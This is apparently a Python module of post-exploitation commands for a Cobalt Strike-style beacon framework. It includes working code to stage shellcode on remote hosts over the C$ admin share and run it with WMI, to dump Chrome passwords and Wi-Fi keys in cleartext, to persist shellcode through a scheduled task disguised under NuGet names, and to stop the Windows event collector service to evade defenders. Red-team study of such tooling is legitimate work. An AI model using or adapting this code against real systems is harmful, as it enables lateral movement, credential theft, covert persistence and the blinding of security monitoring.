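def lateral_wmi_shellcode(bid, host, shellcode, user=None, password=None):
    r"""Run *shellcode* on *host* from beacon *bid* using SMB (C$) for staging and WMI for execution.

    Flow:
      1. Upload ``tools/native.exe`` and the shellcode file into ``\\host\C$\WINDOWS``
         under randomized NuGet-looking names (``NugetPackage.<rand>.exe`` / ``nuget.<rand>.package``).
      2. From the beacon, run ``wmic /node:host process call create`` so the helper is
         started on the target with the staged shellcode path as its only argument and
         ``C:\WINDOWS`` as its working directory.

    Args:
        bid: beacon id that performs the uploads and issues the wmic call (its token
            must have access to ``C$`` and WMI on *host*).
        host: target hostname or IP; used verbatim in the UNC path and ``/node:``.
        shellcode: local path of the raw shellcode file to stage.
        user: optional explicit account for ``wmic /user:``.
        password: optional password for ``wmic /password:``.

    Both credentials are wrapped in double quotes so spaces and most cmd metacharacters
    survive, but a value that itself contains ``"`` still breaks the command line.
    The staged files are not removed by this function.
    """
    native_helper = utils.basedir('tools/native.exe')

    # Staging directory: C:\WINDOWS on the target, reached over the admin share.
    temp_relative = 'WINDOWS'
    temp_remote = r'\\{}\C$\{}'.format(host, temp_relative)
    temp_local = r'C:\{}'.format(temp_relative)

    native_helper_relative = 'NugetPackage.{}.exe'.format(helpers.randstr())
    native_helper_remote = r'{}\{}'.format(temp_remote, native_helper_relative)
    native_helper_local = r'{}\{}'.format(temp_local, native_helper_relative)

    shellcode_relative = r'nuget.{}.package'.format(helpers.randstr())
    shellcode_remote = r'{}\{}'.format(temp_remote, shellcode_relative)
    shellcode_local = r'{}\{}'.format(temp_local, shellcode_relative)

    # upload both artifacts over SMB
    helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)

    # command line as it will run on the target
    remote_command = '{} {}'.format(native_helper_local, shellcode_local)

    # echo the host first so the beacon output shows which target the result belongs to
    local_command = 'echo "{host}" & wmic /node:"{host}" '.format(host=host)
    if user or password:
        # quoted so a password with spaces or & | < > does not split the command line
        local_command += ' /user:"{user}" /password:"{password}" '.format(
            user=user, password=password)
    local_command += 'process call create "{command}","{cwd}"'.format(
        command=remote_command, cwd=temp_local)
    aggressor.bshell(bid, local_command)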
def _(bid, *files):
    """Print one or more remote files with ``type`` in a single cmd task.

    Args:
        bid: beacon id to task.
        *files: remote paths, one ``type`` line each; they are inserted unquoted,
            so a path containing spaces must already be quoted by the operator.

    With no files given, reports an error via ``aggressor.berror`` and does nothing.
    """
    if not files:
        aggressor.berror('cat: specify some files to cat')
        return
    type_lines = ['type {}'.format(path) for path in files]
    aggressor.bshell(bid, '\n'.join(type_lines))
def _(bid):
    """Stage and run the Chrome credential dumper on the beacon host.

    ``tools/chrome-passwords.exe`` is uploaded as ``temp.exe`` into the directory
    returned by ``helpers.guess_home`` and executed with its stdout redirected to a
    file named ``c`` in the same directory; a follow-up echo tells the operator to
    run ``grab-chrome-next`` to collect it. Neither file is cleaned up here.
    """
    home = str(helpers.guess_home(bid))
    out_file = r'{}\c'.format(home)
    dest = r'{}\temp.exe'.format(home)

    helpers.upload_to(bid, utils.basedir('tools/chrome-passwords.exe'), dest)

    # paths are cmd-quoted so a home directory with spaces still works
    run_and_notify = r'{} > {} & echo "Chrome credentials ready at {}. Run grab-chrome-next"'.format(
        cmd_quote(dest), cmd_quote(out_file), out_file)
    aggressor.bshell(bid, run_and_notify)
def _(bid, profile=None):
    """Dump saved WLAN profiles, including cleartext keys, from the beacon host.

    Args:
        bid: beacon id to task.
        profile: optional profile name. When given, that profile is exported with
            ``netsh wlan export profile ... key=clear`` into ``$env:temp`` via
            PowerShell (bpowerpick), printed, and the XML removed again. When
            omitted, every profile is listed through cmd with
            ``netsh wlan show profiles name="*" key=clear``.

    *profile* is interpolated into the script unescaped (operator input); a name
    containing quotes or backticks will break the PowerShell.
    """
    if not profile:
        aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear')
        return

    # NOTE(review): `$env:temp:\*<name>*.xml` and the assignment to PowerShell's
    # automatic `$profile` variable look fragile — confirm this resolves the
    # exported XML on a live target before relying on it.
    script = helpers.code_string("""
        netsh wlan export profile name="{name}" folder=$env:temp key=clear
        $profile = $env:temp:\\*{name}*.xml
        get-content $profile
        rm $profile
    """.format(name=profile))
    aggressor.bpowerpick(bid, script)
def _(bid, shellcode):
    r"""Persist *shellcode* on the beacon host through a daily scheduled task.

    Creates ``<appdata>\NuGet`` (per ``helpers.guess_appdata``), uploads the
    shellcode there as ``nuget.package`` and ``tools/native_persist.exe`` as
    ``NugetManager.exe``, then registers the task ``NugetUpdate`` (``/f`` overwrites
    an existing one) to run the helper on a daily schedule.

    Args:
        bid: beacon id to task.
        shellcode: local path of the raw shellcode file to stage.

    NOTE(review): the ``/tr`` path is inserted unquoted; if the appdata path
    contains spaces the task action will be truncated — confirm guess_appdata's
    output on the targets you use this against.
    """
    local_helper = utils.basedir('tools/native_persist.exe')
    nuget_dir = r'{}\NuGet'.format(helpers.guess_appdata(bid))
    remote_helper = r'{}\NugetManager.exe'.format(nuget_dir)
    remote_shellcode = r'{}\nuget.package'.format(nuget_dir)

    # directory first, then payload, then the helper that consumes it
    aggressor.bmkdir(bid, nuget_dir)
    helpers.upload_to(bid, shellcode, remote_shellcode)
    helpers.upload_to(bid, local_helper, remote_helper)

    task_command = 'schtasks /create /f /tn NugetUpdate /sc daily /tr {}'.format(remote_helper)
    aggressor.bshell(bid, task_command)
def _(bid):
    """Query ``resolver1.opendns.com`` for ``myip.opendns.com`` from the beacon host.

    The answer is the public (WAN) address the resolver sees for the host; this
    generates an outbound DNS query to an external resolver, which may be logged.
    """
    wanip_query = 'nslookup myip.opendns.com. resolver1.opendns.com'
    aggressor.bshell(bid, wanip_query)
def _(bid):
    """List installed applications (Name, Version, Description) via ``wmic product``.

    NOTE(review): ``wmic product`` enumerates the Win32_Product class, which is
    known to be slow and to trigger MSI consistency checks on the host — noisy
    in event logs; confirm that is acceptable for the engagement.
    """
    inventory_query = 'wmic product get Name,Version,Description'
    aggressor.bshell(bid, inventory_query)
def _(bid, *args):
    """Run the operator's arguments, space-joined, as one raw cmd.exe line on the beacon."""
    aggressor.bshell(bid, ' '.join(args))
def _(bid):
    """Liveness check: task the beacon to ``echo pong`` through cmd."""
    reply = 'echo pong'
    aggressor.bshell(bid, reply)
def _(bid, host):
    """Resolve *host* on the beacon with ``nslookup`` (no explicit server, so the host's default resolver).

    *host* is placed inside double quotes without escaping; it is operator input,
    but a value containing ``"`` or ``&`` would alter the command line.
    """
    lookup = 'nslookup "{}"'.format(host)
    aggressor.bshell(bid, lookup)
def _(bid):
    """Get the beacon host's WAN IP via DNS, logging the task and running the command silently.

    Asks ``resolver1.opendns.com`` for ``myip.opendns.com``; the answer is the
    public address the external resolver sees. Outbound DNS to OpenDNS is
    generated and may be logged on the target network.
    """
    aggressor.btask(bid, 'Tasked beacon to get WANIP via DNS')
    wanip_query = 'nslookup myip.opendns.com. resolver1.opendns.com'
    aggressor.bshell(bid, wanip_query, silent=True)
def _(bid):
    """List installed applications via ``wmic product``, logging the task and running silently.

    NOTE(review): Win32_Product enumeration is slow and is known to trigger MSI
    consistency checks (and matching event-log entries) on the host.
    """
    aggressor.btask(bid, 'Tasked beacon to get list of applications')
    inventory_query = 'wmic product get Name,Version,Description'
    aggressor.bshell(bid, inventory_query, silent=True)
def finish(text):
    """Run *text* as a cmd.exe line on every beacon in ``bids``.

    ``bids`` is not a parameter: it is taken from the enclosing scope (this looks
    like a closure inside a multi-beacon command), so the caller must have it
    bound when this is invoked.
    """
    for beacon in bids:
        aggressor.bshell(beacon, text)
def _(bid):
    """Stop the ``wecsvc`` service on the beacon host with ``sc stop``.

    Presumably the Windows Event Collector service (forwarded-event ingestion);
    stopping it requires a privileged token and the stop itself is visible in
    the System event log, so treat it as a noisy defense-evasion step.
    """
    stop_collector = "sc stop wecsvc"
    aggressor.bshell(bid, stop_collector)